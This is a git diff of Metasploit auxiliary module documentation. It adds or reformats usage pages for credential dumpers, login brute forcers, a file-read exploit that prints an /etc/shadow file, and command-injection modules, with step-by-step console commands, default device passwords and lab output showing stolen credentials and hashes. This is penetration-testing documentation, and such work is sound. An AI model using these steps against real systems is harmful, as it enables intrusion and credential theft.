|
||||||
|
4. Do: `run`
|
||||||
|
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**URL**
|
||||||
|
|
||||||
|
The URL of a PDF to analyse.
|
||||||
|
|
||||||
|
**URL_LIST**
|
||||||
|
|
||||||
|
File containing a list of PDF URLs to analyze.
|
||||||
|
|
||||||
|
**OUTFILE**
|
||||||
|
|
||||||
|
File to store extracted author names.
|
||||||
|
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### URL
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(http_pdf_authors) > set url http://127.0.0.1/test4.pdf
|
||||||
|
url => http://127.0.0.1/test4.pdf
|
||||||
|
msf auxiliary(http_pdf_authors) > run
|
||||||
|
|
||||||
|
[*] Processing 1 URLs...
|
||||||
|
[*] Downloading 'http://127.0.0.1/test4.pdf'
|
||||||
|
[*] HTTP 200 -- Downloaded PDF (38867 bytes)
|
||||||
|
[+] PDF Author: Administrator
|
||||||
|
[*] 100.00% done (1/1 files)
|
||||||
|
|
||||||
|
[+] Found 1 authors: Administrator
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
|
||||||
|
### URL_LIST with OUTFILE
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(http_pdf_authors) > set outfile /root/output
|
||||||
|
outfile => /root/output
|
||||||
|
msf auxiliary(http_pdf_authors) > set url_list /root/urls
|
||||||
|
url_list => /root/urls
|
||||||
|
msf auxiliary(http_pdf_authors) > run
|
||||||
|
|
||||||
|
[*] Processing 8 URLs...
|
||||||
|
[*] Downloading 'http://127.0.0.1:80/test.pdf'
|
||||||
|
[*] HTTP 200 -- Downloaded PDF (89283 bytes)
|
||||||
|
[*] 12.50% done (1/8 files)
|
||||||
|
[*] Downloading 'http://127.0.0.1/test2.pdf'
|
||||||
|
[*] HTTP 200 -- Downloaded PDF (636661 bytes)
|
||||||
|
[+] PDF Author: sqlmap developers
|
||||||
|
[*] 25.00% done (2/8 files)
|
||||||
|
[*] Downloading 'http://127.0.0.1/test3.pdf'
|
||||||
|
[*] HTTP 200 -- Downloaded PDF (167478 bytes)
|
||||||
|
[+] PDF Author: Evil1
|
||||||
|
[*] 37.50% done (3/8 files)
|
||||||
|
[*] Downloading 'http://127.0.0.1/test4.pdf'
|
||||||
|
[*] HTTP 200 -- Downloaded PDF (38867 bytes)
|
||||||
|
[+] PDF Author: Administrator
|
||||||
|
[*] 50.00% done (4/8 files)
|
||||||
|
[*] Downloading 'http://127.0.0.1/test5.pdf'
|
||||||
|
[*] HTTP 200 -- Downloaded PDF (34312 bytes)
|
||||||
|
[+] PDF Author: ekama
|
||||||
|
[*] 62.50% done (5/8 files)
|
||||||
|
[*] Downloading 'http://127.0.0.1/doesnotexist.pdf'
|
||||||
|
[*] HTTP 404 -- Downloaded PDF (289 bytes)
|
||||||
|
[-] Could not parse PDF: PDF is malformed
|
||||||
|
[*] 75.00% done (6/8 files)
|
||||||
|
[*] Downloading 'https://127.0.0.1/test.pdf'
|
||||||
|
[-] Connection failed: Failed to open TCP connection to 127.0.0.1:443 (Connection refused - connect(2) for "127.0.0.1" port 443)
|
||||||
|
[*] Downloading 'https://127.0.0.1:80/test.pdf'
|
||||||
|
[-] Connection failed: SSL_connect returned=1 errno=0 state=unknown state: unknown protocol
|
||||||
|
|
||||||
|
[+] Found 4 authors: sqlmap developers, Evil1, Administrator, ekama
|
||||||
|
[*] Writing data to /root/output...
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,53 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module retrieves user credentials from BearWare TeamTalk.
|
||||||
|
|
||||||
|
Valid administrator credentials are required.
|
||||||
|
|
||||||
|
Starting from version 5, TeamTalk allows users to login using a username and password combination. The username and password are stored on the server in clear text and can be retrieved remotely by any user with administrator privileges.
|
||||||
|
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
[TeamTalk 5](http://www.bearware.dk/) is a freeware conferencing system which allows multiple users to participate in audio and video conversations. The TeamTalk install file includes both client and server application. A special client application is included with accessibility features for visually impaired.
|
||||||
|
|
||||||
|
This module has been tested successfully on TeamTalk versions 5.2.2.4885 and 5.2.3.4893.
|
||||||
|
|
||||||
|
The TeamTalk software is available on the [BearWare website](http://www.bearware.dk/) and on [GitHub](https://github.com/BearWare/TeamTalk5).
|
||||||
|
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start `msfconsole`
|
||||||
|
2. Do: `use auxiliary/gather/teamtalk_creds`
|
||||||
|
3. Do: `set rhost <RHOST>`
|
||||||
|
4. Do: `set rport <RPORT>` (default: `10333`)
|
||||||
|
5. Do: `set username <USERNAME>` (default: `admin`)
|
||||||
|
6. Do: `set password <PASSWORD>` (default: `admin`)
|
||||||
|
7. Do: `run`
|
||||||
|
8. You should get credentials
|
||||||
|
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
[*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2)
|
||||||
|
[+] 172.16.191.166:10333 - Authenticated successfully
|
||||||
|
[+] 172.16.191.166:10333 - User is an administrator
|
||||||
|
[*] 172.16.191.166:10333 - Found 5 users
|
||||||
|
|
||||||
|
TeamTalk User Credentials
|
||||||
|
=========================
|
||||||
|
|
||||||
|
Username Password Type
|
||||||
|
-------- -------- ----
|
||||||
|
debbie 1234567890 1
|
||||||
|
murphy 934txs 2
|
||||||
|
quinn ~!@#$%^&*()_+{}|:" <>?;',./ 2
|
||||||
|
sparks password 2
|
||||||
|
stormy 1
|
||||||
|
|
||||||
|
[+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
|
|
@ -57,9 +57,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
|
||||||
3. Do: ```set RPORT [IP]```
|
3. Do: ```set RPORT [IP]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
### On vsFTPd 3.0.3 on Kali
|
### vsFTPd 3.0.3 on Kali
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/ftp/anonymous
|
msf > use auxiliary/scanner/ftp/anonymous
|
||||||
|
|
|
@ -47,7 +47,8 @@ This module will test FTP logins on a range of machines and report successful lo
|
||||||
3. Do: ```set RPORT [IP]```
|
3. Do: ```set RPORT [IP]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf> use auxiliary/scanner/ftp/ftp_login
|
msf> use auxiliary/scanner/ftp/ftp_login
|
||||||
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org
|
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org
|
||||||
|
|
|
@ -47,9 +47,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
|
||||||
3. Do: ```set RPORT [IP]```
|
3. Do: ```set RPORT [IP]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
### On vsFTPd 3.0.3 on Kali
|
### vsFTPd 3.0.3 on Kali
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/ftp/ftp_version
|
msf > use auxiliary/scanner/ftp/ftp_version
|
||||||
|
|
|
@ -1,4 +1,13 @@
|
||||||
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.
|
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials.
|
||||||
|
There are four (4) default accounts:
|
||||||
|
|
||||||
|
1. root/root
|
||||||
|
2. admin/1
|
||||||
|
3. alg/1
|
||||||
|
4. user/1
|
||||||
|
|
||||||
|
In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file.
|
||||||
|
The module attempts to download configuration and password files depending on the login user credentials found.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -7,7 +16,7 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual
|
||||||
3. Do: ```set RPORT [PORT]```
|
3. Do: ```set RPORT [PORT]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump
|
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump
|
||||||
|
|
|
@ -0,0 +1,59 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
|
||||||
|
The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
|
||||||
|
|
||||||
|
[Inedo website](http://inedo.com/)
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/buildmaster_login```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: Set credentials
|
||||||
|
5. Do: ```run```
|
||||||
|
6. You should see the module attempting to log in.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Attempt to login with the default credentials.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/buildmaster_login
|
||||||
|
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
|
||||||
|
RHOSTS => 10.0.0.39
|
||||||
|
msf auxiliary(buildmaster_login) > run
|
||||||
|
|
||||||
|
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
|
||||||
|
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
|
||||||
|
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(buildmaster_login) >
|
||||||
|
```
|
||||||
|
|
||||||
|
### Brute force with credentials from file.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/buildmaster_login
|
||||||
|
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
|
||||||
|
RHOSTS => 10.0.0.39
|
||||||
|
msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
|
||||||
|
USERPASS_FILE => ~/BuildMasterCreds.txt
|
||||||
|
msf auxiliary(buildmaster_login) > run
|
||||||
|
|
||||||
|
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
|
||||||
|
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test"
|
||||||
|
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test"
|
||||||
|
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong"
|
||||||
|
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong"
|
||||||
|
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
|
||||||
|
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(buildmaster_login) >
|
||||||
|
```
|
|
@ -6,9 +6,9 @@ This module is a scanner which enumerates Google Chromecast via its HTTP interfa
|
||||||
2. Do: ```set RHOSTS [IP]```
|
2. Do: ```set RHOSTS [IP]```
|
||||||
3. Do: ```run```
|
3. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
|
### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/chromecast_webserver
|
msf > use auxiliary/scanner/http/chromecast_webserver
|
||||||
|
|
|
@ -6,9 +6,9 @@ This module is a scanner which enumerates WiFi access points visible from a Goog
|
||||||
2. Do: ```set RHOSTS [IP]```
|
2. Do: ```set RHOSTS [IP]```
|
||||||
3. Do: ```run```
|
3. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
|
### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/chromecast_wifi
|
msf > use auxiliary/scanner/http/chromecast_wifi
|
||||||
|
|
|
@ -17,7 +17,7 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862
|
||||||
|
|
||||||
1. Make sure Cisco Firepower Management console's HTTPS service is running
|
1. Make sure Cisco Firepower Management console's HTTPS service is running
|
||||||
2. Start ```msfconsole```
|
2. Start ```msfconsole```
|
||||||
3. ```use auxiliary/scanner/http/cisco_firepower_login.rb
|
3. ```use auxiliary/scanner/http/cisco_firepower_login.rb```
|
||||||
4. ```set RHOSTS [IP]```
|
4. ```set RHOSTS [IP]```
|
||||||
5. Set credentials
|
5. Set credentials
|
||||||
6. ```run```
|
6. ```run```
|
||||||
|
|
|
@ -34,9 +34,10 @@ You can use any web application to test the crawler.
|
||||||
4. Do: ```set URI [PATH]```
|
4. Do: ```set URI [PATH]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
|
### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
|
||||||
|
|
||||||
```
|
```
|
||||||
msf> use auxiliary/scanner/http/crawler
|
msf> use auxiliary/scanner/http/crawler
|
||||||
msf auxiliary(crawler) > set RHOST 127.0.0.1
|
msf auxiliary(crawler) > set RHOST 127.0.0.1
|
||||||
|
|
|
@ -1,4 +1,9 @@
|
||||||
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to execute arbitrary system commands.
|
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
|
||||||
|
It requires any one of the following login credentials to execute arbitrary system commands:
|
||||||
|
|
||||||
|
1. admin/admin
|
||||||
|
2. installer/installer
|
||||||
|
3. home/home
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
|
||||||
3. Do: ```set RPORT [PORT]```
|
3. Do: ```set RPORT [PORT]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/epmp1000_cmd_exec
|
msf > use auxiliary/scanner/http/epmp1000_cmd_exec
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file.
|
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly.
|
||||||
|
This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -7,7 +8,7 @@ This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box
|
||||||
3. Do: ```set RPORT [PORT]```
|
3. Do: ```set RPORT [PORT]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/epmp1000_dump_config
|
msf > use auxiliary/scanner/http/epmp1000_dump_config
|
||||||
|
|
|
@ -1,4 +1,9 @@
|
||||||
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to dump system hashes.
|
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
|
||||||
|
It requires any one of the following login credentials to dump system hashes:
|
||||||
|
|
||||||
|
1. admin/admin
|
||||||
|
2. installer/installer
|
||||||
|
3. home/home
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
|
||||||
3. Do: ```set RPORT [PORT]```
|
3. Do: ```set RPORT [PORT]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/epmp1000_dump_hashes
|
msf > use auxiliary/scanner/http/epmp1000_dump_hashes
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.
|
This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials.
|
||||||
|
Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -7,7 +8,7 @@ This module scans for Cambium ePMP 1000 management login portal(s), and attempts
|
||||||
3. Do: ```set RPORT [PORT]```
|
3. Do: ```set RPORT [PORT]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/epmp1000_web_login
|
msf > use auxiliary/scanner/http/epmp1000_web_login
|
||||||
|
|
|
@ -1,11 +1,13 @@
|
||||||
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
|
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration.
|
||||||
|
A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
|
||||||
|
|
||||||
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
|
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db.
|
||||||
|
This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
|
||||||
|
|
||||||
Vulnerable firmware versions include:
|
Vulnerable firmware versions include:
|
||||||
|
|
||||||
VMU-C EM prior to firmware Version A11_U05
|
* VMU-C EM prior to firmware Version A11_U05
|
||||||
VMU-C PV prior to firmware Version A17.
|
* VMU-C PV prior to firmware Version A17.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -14,7 +16,7 @@ VMU-C PV prior to firmware Version A17.
|
||||||
3. Do: ```set RPORT [PORT]```
|
3. Do: ```set RPORT [PORT]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/gavazzi_em_login_loot
|
msf > use auxiliary/scanner/http/gavazzi_em_login_loot
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
|
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability.
|
||||||
|
The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
|
||||||
|
|
||||||
Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
|
Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
|
||||||
|
|
||||||
|
@ -9,7 +10,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There
|
||||||
3. Do: ```set RPORT [PORT]```
|
3. Do: ```set RPORT [PORT]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin
|
msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin
|
||||||
|
|
|
@ -11,7 +11,8 @@ This module dumps memory contents using a crafted Range header and affects only
|
||||||
3. Do: ```set RPORT [PORT]```
|
3. Do: ```set RPORT [PORT]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
|
msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
|
||||||
msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125
|
msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method.
|
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS.
|
||||||
|
It is typically faster than the traditional form-based OWA login method.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -7,7 +8,7 @@ This module is for password guessing against OWA's EWS service which often expos
|
||||||
3. Set TARGETURI if necessary.
|
3. Set TARGETURI if necessary.
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf auxiliary(owa_ews_login) > run
|
msf auxiliary(owa_ews_login) > run
|
||||||
|
|
|
@ -0,0 +1,57 @@
|
||||||
|
This module exploits an authenticated arbitrary file read in the log module's filter engine.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
The application is available for a 90 day evaluation after free registration from
|
||||||
|
[riverbed](https://www.riverbed.com/gb/products/steelhead/Free-90-day-Evaluation-SteelHead-CX-Virtual-Edition.html).
|
||||||
|
Downloads are available for Hyper-V, ESX(i), and KVM. Installation is straight forward, initial login is `admin`/`password`.
|
||||||
|
If need be from cli, to show the IP address of the device: `show interfaces primary`
|
||||||
|
|
||||||
|
This module was successfully tested against:
|
||||||
|
|
||||||
|
- SteelHead VCX (VCX255U) 9.6.0a
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```auxiliary/scanner/http/riverbed_steelhead_vcx_file_read```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Set TARGETURI if necessary.
|
||||||
|
3. Set FILE if necessary.
|
||||||
|
3. Set USERNAME if necessary.
|
||||||
|
3. Set PASSWORD if necessary.
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### SteelHead VCX255u 9.6.0a running on ESXi
|
||||||
|
|
||||||
|
```
|
||||||
|
resource (riverbed.rc)> use auxiliary/scanner/http/riverbed_steelhead_vcx_file_read
|
||||||
|
resource (riverbed.rc)> set rhosts 192.168.2.198
|
||||||
|
rhosts => 192.168.2.198
|
||||||
|
resource (riverbed.rc)> set verbose true
|
||||||
|
verbose => true
|
||||||
|
resource (riverbed.rc)> run
|
||||||
|
[*] CSRF Token: 18PK64EKpo4d6y0X5ZOMYJ3fxfYZKfrN
|
||||||
|
[+] Authenticated Successfully
|
||||||
|
[+] File Contents:
|
||||||
|
admin:$6$sKOU5moa$B2szxiSEzq6ZmHZw01CMf64WlzvqIgCYETeXzF1ItxZ5soOJNVXdE2H5N19t0cPeGDf/LGvRymgQHAxgojr6u1:10000:0:99999:7:::
|
||||||
|
administrator:*:10000:0:99999:7:::
|
||||||
|
apache:*:10000:0:99999:7:::
|
||||||
|
localvixuser:*:10000:0:99999:7:::
|
||||||
|
named:*:10000:0:99999:7:::
|
||||||
|
nobody:*:10000:0:99999:7:::
|
||||||
|
ntp:*:10000:0:99999:7:::
|
||||||
|
pcap:*:10000:0:99999:7:::
|
||||||
|
postgres:*:10000:0:99999:7:::
|
||||||
|
rcud:*:10000:0:99999:7:::
|
||||||
|
root:*:10000:0:99999:7:::
|
||||||
|
rpc:*:10000:0:99999:7:::
|
||||||
|
shark:*:10000:0:99999:7:::
|
||||||
|
sshd:*:10000:0:99999:7:::
|
||||||
|
statsd:*:10000:0:99999:7:::
|
||||||
|
webproxy::10000:0:99999:7:::
|
||||||
|
[+] Stored /etc/shadow to /root/.msf4/loot/20170602230238_default_192.168.2.198_host.file_311580.txt
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
|
@ -25,7 +25,8 @@ is extremely common.
|
||||||
You can set the test path where the scanner will try to find `robots.txt` file.
|
You can set the test path where the scanner will try to find `robots.txt` file.
|
||||||
Default is `/`
|
Default is `/`
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf> use auxiliary/scanner/http/robots_txt
|
msf> use auxiliary/scanner/http/robots_txt
|
||||||
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238
|
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238
|
||||||
|
|
|
@ -0,0 +1,70 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module exploits a vulnerability in the WebNews web interface of SurgeNews on TCP ports 9080 and 8119 which allows unauthenticated users to download arbitrary files from the software root directory; including the user database, configuration files and log files.
|
||||||
|
|
||||||
|
This module extracts the administrator username and password, and the usernames and passwords or password hashes for all users.
|
||||||
|
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
[SurgeNews](http://netwinsite.com/surgenews/) is a high performance, fully threaded, next generation News Server with integrated WebNews interface.
|
||||||
|
|
||||||
|
This module has been tested successfully on:
|
||||||
|
|
||||||
|
* SurgeNews version 2.0a-13 on Windows 7 SP 1.
|
||||||
|
* SurgeNews version 2.0a-12 on Ubuntu Linux.
|
||||||
|
|
||||||
|
Installers:
|
||||||
|
|
||||||
|
* [SurgeNews Installers](http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgenews)
|
||||||
|
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start `msfconsole`
|
||||||
|
2. Do: `use auxiliary/scanner/http/surgenews_user_creds`
|
||||||
|
3. Do: `set rhosts [IP]`
|
||||||
|
4. Do: `run`
|
||||||
|
5. You should get credentials
|
||||||
|
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/surgenews_user_creds
|
||||||
|
msf auxiliary(surgenews_user_creds) > set rhosts 172.16.191.133 172.16.191.166
|
||||||
|
rhosts => 172.16.191.133 172.16.191.166
|
||||||
|
msf auxiliary(surgenews_user_creds) > run
|
||||||
|
|
||||||
|
[+] Found administrator credentials (admin:admin)
|
||||||
|
|
||||||
|
SurgeNews User Credentials
|
||||||
|
==========================
|
||||||
|
|
||||||
|
Username Password Password Hash Admin
|
||||||
|
-------- -------- ------------- -----
|
||||||
|
admin admin true
|
||||||
|
qwerty@bt {ssha}BuFLjIFUUSy1IltX3AuN420qV2ZFU7EL false
|
||||||
|
user@bt {ssha}HFTkDsnNlLiaHN+sIS9VQarVGGXmYISn false
|
||||||
|
|
||||||
|
[+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.133_surgenews.user.c_633569.txt
|
||||||
|
[*] Scanned 1 of 2 hosts (50% complete)
|
||||||
|
[+] Found administrator credentials (test:test)
|
||||||
|
[+] Found user credentials (zxcv@win-sgbsd5tqutq:zxcv)
|
||||||
|
|
||||||
|
SurgeNews User Credentials
|
||||||
|
==========================
|
||||||
|
|
||||||
|
Username Password Password Hash Admin
|
||||||
|
-------- -------- ------------- -----
|
||||||
|
asdf@win-sgbsd5tqutq {ssha}8ytixKjxf3kaBc6T471R1Re/C8MUnKnF false
|
||||||
|
test test true
|
||||||
|
test@win-sgbsd5tqutq {ssha}Vw8EkFxAJuiZrb98Fz+sdr/yEEmBZ2Jc false
|
||||||
|
test@win-sgbsd5tqutq {ssha}j4teSf4CgA3+XVRJscFHyqoOQJRoLg4K false
|
||||||
|
zxcv@win-sgbsd5tqutq zxcv false
